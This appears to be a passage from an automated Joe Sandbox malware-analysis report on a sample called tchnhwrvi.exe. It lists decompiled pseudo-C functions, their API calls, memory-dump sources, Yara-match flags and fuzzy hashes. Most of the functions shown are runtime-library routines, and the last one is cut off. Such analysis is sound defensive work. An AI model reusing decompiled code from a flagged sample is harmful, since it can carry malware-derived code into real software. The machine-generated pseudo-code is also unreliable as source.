                    • SendMessageW.USER32(?,000000BB,00000000,00000000), ref: 002810F4
                    • SendMessageW.USER32(?,00000029,00000000,?), ref: 0028113D
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 8f9e7e1eb2eb4ff65370eb654d8b063f56432c1875c7e953f8628fa1716ea4b8
                    • Instruction ID: 745d8aea2948d59e8f4131270c2d6e2400b802fcee182b485bd219908670f12e
                    • Opcode Fuzzy Hash: 8f9e7e1eb2eb4ff65370eb654d8b063f56432c1875c7e953f8628fa1716ea4b8
                    • Instruction Fuzzy Hash: 6211E679A20204EFDB20DB65FC89FAB73BDE788700F104217FA05971D0DA71A955CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0028CB2D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0028CB2D(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0028C41F(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0028C506(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0028CA40(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0028C97F(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                    0x0028cb32
                    0x0028cb38
                    0x0028cbab
                    0x00000000
                    0x0028cb3f
                    0x0028cb3f
                    0x0028cb42
                    0x0028cb5d
                    0x0028cb60
                    0x0028cb80
                    0x0028cb92
                    0x0028cb62
                    0x0028cb62
                    0x0028cb65
                    0x00000000
                    0x0028cb67
                    0x0028cb79
                    0x0028cb79
                    0x0028cb65
                    0x0028cbb0
                    0x0028cbb4
                    0x0028cb44
                    0x0028cb5c
                    0x0028cb5c
                    0x0028cb42

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction ID: 9869ca653316b93273578c834a361c9a5a89d74068560ac355614e0913b6d024
                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction Fuzzy Hash: 2911C27A01114EBBCF126E84DC12CEE3F22FB08394B288415FE1858070D336C9B1ABA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 002866B4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E002866B4() {
				WCHAR* _t2;
				void* _t15;
				WCHAR* _t17;

				_t2 = GetEnvironmentStringsW();
				_t17 = _t2;
				if(_t17 != 0) {
					if( *_t17 != 0) {
						goto L3;
						do {
							do {
								L3:
								_t2 =  &(_t2[1]);
							} while ( *_t2 != 0);
							_t2 =  &(_t2[1]);
						} while ( *_t2 != 0);
					}
					_t1 = _t2 - _t17 + 2; // -2
					_t10 = _t1;
					_t15 = E00286C85(_t1);
					if(_t15 != 0) {
						E002898B0(_t15, _t17, _t10);
					}
					FreeEnvironmentStringsW(_t17);
					return _t15;
				} else {
					return 0;
				}
			}






                    0x002866b7
                    0x002866bd
                    0x002866c3
                    0x002866cc
                    0x00000000
                    0x002866ce
                    0x002866ce
                    0x002866ce
                    0x002866ce
                    0x002866d1
                    0x002866d6
                    0x002866d9
                    0x002866ce
                    0x002866e1
                    0x002866e1
                    0x002866eb
                    0x002866f0
                    0x00286702
                    0x00286707
                    0x002866f3
                    0x002866fe
                    0x002866c5
                    0x002866c8
                    0x002866c8

                    APIs
                    • GetEnvironmentStringsW.KERNEL32(00000000,002834C3), ref: 002866B7
                    • __malloc_crt.LIBCMT ref: 002866E6
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002866F3
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: EnvironmentStrings$Free__malloc_crt
                    • String ID:
                    • API String ID: 237123855-0
                    • Opcode ID: 5feb5e2e281e54c244659ac014d7db412709a4fa045606493c8e40ed6a3999c8
                    • Instruction ID: bcaabd3be9ac1cb0bb9c4001a32e45f8ee12cb551e5e2380e89b971fcad1fe64
                    • Opcode Fuzzy Hash: 5feb5e2e281e54c244659ac014d7db412709a4fa045606493c8e40ed6a3999c8
                    • Instruction Fuzzy Hash: 75F0827F9225729E9B317F34BC4E867263EDED136031A4426F402D3194FA648DA587A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00282610 Relevance: 6.0, APIs: 4, Instructions: 39windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00282610(intOrPtr _a4) {
				short _v516;
				short _v1028;

				LoadStringW( *0x2970e0, 0x179,  &_v516, 3);
				wsprintfW( &_v1028,  &_v516, _a4);
				LoadStringW( *0x2970e0, 0x171,  &_v516, 6);
				return MessageBoxW( *0x2970e4,  &_v1028,  &_v516, 0x33);
			}





                    0x00282635
                    0x00282649
                    0x00282666
                    0x00282688

                    APIs
                    • LoadStringW.USER32(?,00000179,?,00000003), ref: 00282635
                    • wsprintfW.USER32 ref: 00282649
                    • LoadStringW.USER32(?,00000171,?,00000006), ref: 00282666
                    • MessageBoxW.USER32(?,?,?,00000033), ref: 0028267E
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: LoadString$Messagewsprintf
                    • String ID:
                    • API String ID: 3675432989-0
                    • Opcode ID: 32b838d3014462a6ed3094297d467b3e168fcbfeb6e0b64198a6beaf648b8e5f
                    • Instruction ID: 8efd40926e72bb3c5ca581b9dc27891ea6d394ff418b03ed738ca7b7ff8d4a26
                    • Opcode Fuzzy Hash: 32b838d3014462a6ed3094297d467b3e168fcbfeb6e0b64198a6beaf648b8e5f
                    • Instruction Fuzzy Hash: 290144B6920218AFD711DB98EC89FF6737CBB48700F04818BB709A7181D6706A14CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B766 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040B766(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x415880, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0040B74F();
					E0040B711();
					_t13 = WriteConsoleW( *0x415880, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                    0x0040b783
                    0x0040b787
                    0x0040b794
                    0x0040b799
                    0x0040b7b4
                    0x0040b7b4
                    0x0040b7ba

                    APIs
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000), ref: 0040B77D
                    • GetLastError.KERNEL32(?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008,?,0040A922,00000000), ref: 0040B789
                      • Part of subcall function 0040B74F: CloseHandle.KERNEL32(FFFFFFFE,0040B799,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008), ref: 0040B75F
                    • ___initconout.LIBCMT ref: 0040B799
                      • Part of subcall function 0040B711: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040B740,0040AF0D,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B724
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B7AE
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                    • Instruction ID: 9be2d2e95ebdf4ca364c863a04f8f34c4778b8d92ece9612039581527531bafd
                    • Opcode Fuzzy Hash: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                    • Instruction Fuzzy Hash: 72F01236400124BBCF162F96DC049CA3F65EB883B1B008435FA18A6161C7318870DBD8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404751 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMON
                    Download Yara Rule
                    C-Code - Quality: 89%
                    			E00404751(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				intOrPtr* _t33;
				intOrPtr _t36;
				intOrPtr* _t41;
				intOrPtr* _t42;
				WCHAR* _t47;
				intOrPtr _t52;
				void* _t55;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t64;

				_t55 = __edx;
				_t57 = _a4;
				if(_t57 != 0) {
					if(_t57 == 2 || _t57 == 1) {
						GetModuleFileNameW(0, 0x415d20, 0x104);
						 *0x415f88 = 0x415d20;
						_t47 =  *0x415f9c; // 0x1551c54
						if(_t47 == 0 ||  *_t47 == 0) {
							_t47 = 0x415d20;
						}
						_v8 = 0;
						_v16 = 0;
						_t61 = E00404A28(E00404887(_t47, 0, 0,  &_v8,  &_v16), _v8, _v16, 2);
						if(_t61 != 0) {
							E00404887(_t47, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
							if(_t57 != 1) {
								_push( &_v12);
								_v12 = 0;
								_t58 = E00406A91(0, _t55, _t57, _t61);
								if(_t58 == 0) {
									_t56 = _v12;
									_t52 = 0;
									_t33 = _t56;
									if( *_t56 == 0) {
										L17:
										 *0x415f8c = _t52;
										_v12 = 0;
										 *0x415f94 = _t56;
										E0040650B(0);
										_t58 = 0;
										L18:
										_v12 = 0;
										E0040650B(_t61);
										_t36 = _t58;
										goto L19;
									} else {
										goto L16;
									}
									do {
										L16:
										_t33 = _t33 + 4;
										_t52 = _t52 + 1;
									} while ( *_t33 != 0);
									goto L17;
								}
								E0040650B(_v12);
								goto L18;
							}
							 *0x415f94 = _t61;
							 *0x415f8c = _v8 - 1;
							goto L12;
						} else {
							_t41 = E0040649B();
							_push(0xc);
							_pop(0);
							 *_t41 = 0;
							L12:
							E0040650B(0);
							_t36 = 0;
							L19:
							goto L20;
						}
					} else {
						_t42 = E0040649B();
						_t64 = 0x16;
						 *_t42 = _t64;
						E004062A0();
						_t36 = _t64;
						L20:
						return _t36;
					}
				}
				return 0;
			}




















                    0x00404751
                    0x0040475a
                    0x0040475f
                    0x0040476c
                    0x00404798
                    0x0040479e
                    0x004047a4
                    0x004047ac
                    0x004047b3
                    0x004047b3
                    0x004047bb
                    0x004047c2
                    0x004047db
                    0x004047e2
                    0x00404801
                    0x0040480c
                    0x0040482f
                    0x00404831
                    0x00404839
                    0x0040483f
                    0x0040484b
                    0x0040484e
                    0x00404850
                    0x00404854
                    0x0040485e
                    0x0040485f
                    0x00404865
                    0x00404868
                    0x0040486e
                    0x00404873
                    0x00404875
                    0x00404877
                    0x0040487a
                    0x0040487f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404856
                    0x00404856
                    0x00404856
                    0x00404859
                    0x0040485a
                    0x00000000
                    0x00404856
                    0x00404844
                    0x00000000
                    0x00404844
                    0x00404812
                    0x00404818
                    0x00000000
                    0x004047e4
                    0x004047e4
                    0x004047e9
                    0x004047eb
                    0x004047ec
                    0x0040481f
                    0x00404821
                    0x00404826
                    0x00404881
                    0x00000000
                    0x00404882
                    0x00404773
                    0x00404773
                    0x0040477a
                    0x0040477b
                    0x0040477d
                    0x00404782
                    0x00404883
                    0x00000000
                    0x00404883
                    0x0040476c
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ]A$C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                    • API String ID: 0-3974353124
                    • Opcode ID: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                    • Instruction ID: 516f48771e3ea8525e46061b4c90816104fcc3183a12e04dc85d04e75a492b31
                    • Opcode Fuzzy Hash: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                    • Instruction Fuzzy Hash: 0731D6B6A00214BFD711EF95DC819DFBBACEB85354B11847FF605B7281D6388D018B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 65%
                    			E00403C90(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_t75 = E004029B3(_t96, __ecx, __edx, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E004029B3(_t96, __ecx, __edx, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00402E31(__edx, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E00402D64(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E0040386B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E0040579A(_t96, _t100, _t110, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}













































                    0x00403c90
                    0x00403c90
                    0x00403c97
                    0x00403ca0
                    0x00403dbf
                    0x00403ca6
                    0x00403ca6
                    0x00403ca8
                    0x00403cb2
                    0x00403cb5
                    0x00403cbb
                    0x00403cc5
                    0x00403cea
                    0x00403cef
                    0x00403cf4
                    0x00403dbb
                    0x00000000
                    0x00403dbc
                    0x00403cf4
                    0x00403cc5
                    0x00403cfa
                    0x00403cfd
                    0x00403d00
                    0x00403d06
                    0x00403d0c
                    0x00403d1e
                    0x00403d23
                    0x00403d26
                    0x00403d29
                    0x00403d2c
                    0x00403d2f
                    0x00403d35
                    0x00403d3b
                    0x00403d3e
                    0x00403d41
                    0x00403d50
                    0x00403d51
                    0x00403d51
                    0x00403d56
                    0x00403d69
                    0x00403d6b
                    0x00403d70
                    0x00403d7b
                    0x00403d7d
                    0x00403d7f
                    0x00403d9b
                    0x00403da0
                    0x00403da3
                    0x00403da3
                    0x00403d7b
                    0x00403d70
                    0x00403da9
                    0x00403daa
                    0x00403dad
                    0x00403db0
                    0x00403db3
                    0x00403db6
                    0x00403d41
                    0x00000000
                    0x00403d35
                    0x00403dc0
                    0x00403dc5
                    0x00403dc9
                    0x00403dcc
                    0x00403dcd
                    0x00403dce
                    0x00403dcf
                    0x00403dd4
                    0x00403e4c
                    0x00403e4e
                    0x00403dd6
                    0x00403dd6
                    0x00403ddc
                    0x00000000
                    0x00403dde
                    0x00403de1
                    0x00403de4
                    0x00403deb
                    0x00403dee
                    0x00403df2
                    0x00403e24
                    0x00403e27
                    0x00403e2e
                    0x00403e34
                    0x00403e3e
                    0x00403e47
                    0x00403e47
                    0x00403e3e
                    0x00403e34
                    0x00403e48
                    0x00403df4
                    0x00403df4
                    0x00403df4
                    0x00403df7
                    0x00403df7
                    0x00403dfb
                    0x00000000
                    0x00000000
                    0x00403dff
                    0x00403e13
                    0x00403e13
                    0x00403e01
                    0x00403e01
                    0x00403e07
                    0x00000000
                    0x00403e09
                    0x00403e09
                    0x00403e0c
                    0x00403e11
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403e11
                    0x00403e07
                    0x00403e1c
                    0x00403e1e
                    0x00000000
                    0x00403e20
                    0x00403e20
                    0x00403e20
                    0x00000000
                    0x00403e1e
                    0x00403e17
                    0x00403e19
                    0x00000000
                    0x00403e19
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403de4
                    0x00403ddc
                    0x00403e4f
                    0x00403e53
                    0x00403e53

                    APIs
                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00403CB5
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: EncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 2118026453-2084237596
                    • Opcode ID: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                    • Instruction ID: 27d9d21774ce73f4523aea127e5a37313707127f13db8d93af602d3374e0ea50
                    • Opcode Fuzzy Hash: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                    • Instruction Fuzzy Hash: E9415B72900109EFCF16DF94CE81AEEBBB9BF48305F1840AAF905B7291D3399A50DB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00283581 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00283581() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x2970c0;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x2970c0 = _t5;
				}
				_t6 = E00286CCA(_t5, 4);
				 *0x2960a4 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x294008;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x294288) {
							break;
						}
						_t6 =  *0x2960a4;
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x294018;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x295fa0 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x294078);
					return 0;
				} else {
					 *0x2970c0 = _t26;
					_t6 = E00286CCA(_t26, 4);
					 *0x2960a4 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}













                    0x00283581
                    0x00283589
                    0x0028358c
                    0x00283597
                    0x00283599
                    0x00000000
                    0x00283599
                    0x0028358e
                    0x0028358e
                    0x0028359b
                    0x0028359b
                    0x0028359b
                    0x002835a3
                    0x002835aa
                    0x002835b1
                    0x002835d1
                    0x002835d1
                    0x002835d3
                    0x002835df
                    0x002835df
                    0x002835e2
                    0x002835e5
                    0x002835ee
                    0x00000000
                    0x00000000
                    0x002835da
                    0x002835da
                    0x002835f2
                    0x002835f3
                    0x002835f5
                    0x002835fb
                    0x0028360f
                    0x00283615
                    0x0028361f
                    0x0028361f
                    0x00283621
                    0x00283624
                    0x00283625
                    0x00283631
                    0x002835b3
                    0x002835b6
                    0x002835bc
                    0x002835c3
                    0x002835ca
                    0x00000000
                    0x002835cc
                    0x002835ce
                    0x002835d0
                    0x002835d0
                    0x002835ca

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __calloc_crt
                    • String ID: x@)
                    • API String ID: 3494438863-392705939
                    • Opcode ID: 42214b720b95a94bc751b0f4699651fd09d9b602309f1313767f496c1e86e7fc
                    • Instruction ID: 7b1f0429bc20b716885479a35626b49f6d04e1c7125b07e020435093c934b459
                    • Opcode Fuzzy Hash: 42214b720b95a94bc751b0f4699651fd09d9b602309f1313767f496c1e86e7fc
                    • Instruction Fuzzy Hash: 9311EC367375115BEB18EF1DBC8D6652385FB48B24758012BF605CB3D0EB34DA614740
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004018D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E004018D4(void* __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t10;
				intOrPtr _t15;
				signed int _t16;
				signed int _t18;
				signed int _t20;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr* _t31;
				intOrPtr* _t33;
				void* _t36;

				_t29 = __esi;
				_t28 = __edi;
				_t27 = __edx;
				_t24 = __ecx;
				_t23 = __ebx;
				_t36 = _t24 -  *0x415010; // 0xb51c3102
				if(_t36 != 0) {
					_t31 = _t33;
					_t10 = IsProcessorFeaturePresent(0x17);
					if(_t10 != 0) {
						_t24 = 2;
						asm("int 0x29");
					}
					 *0x415a48 = _t10;
					 *0x415a44 = _t24;
					 *0x415a40 = _t27;
					 *0x415a3c = _t23;
					 *0x415a38 = _t29;
					 *0x415a34 = _t28;
					 *0x415a60 = ss;
					 *0x415a54 = cs;
					 *0x415a30 = ds;
					 *0x415a2c = es;
					 *0x415a28 = fs;
					 *0x415a24 = gs;
					asm("pushfd");
					_pop( *0x415a58);
					 *0x415a4c =  *_t31;
					 *0x415a50 = _v0;
					 *0x415a5c =  &_a4;
					 *0x415998 = 0x10001;
					_t15 =  *0x415a50; // 0x0
					 *0x415954 = _t15;
					 *0x415948 = 0xc0000409;
					 *0x41594c = 1;
					 *0x415958 = 1;
					_t16 = 4;
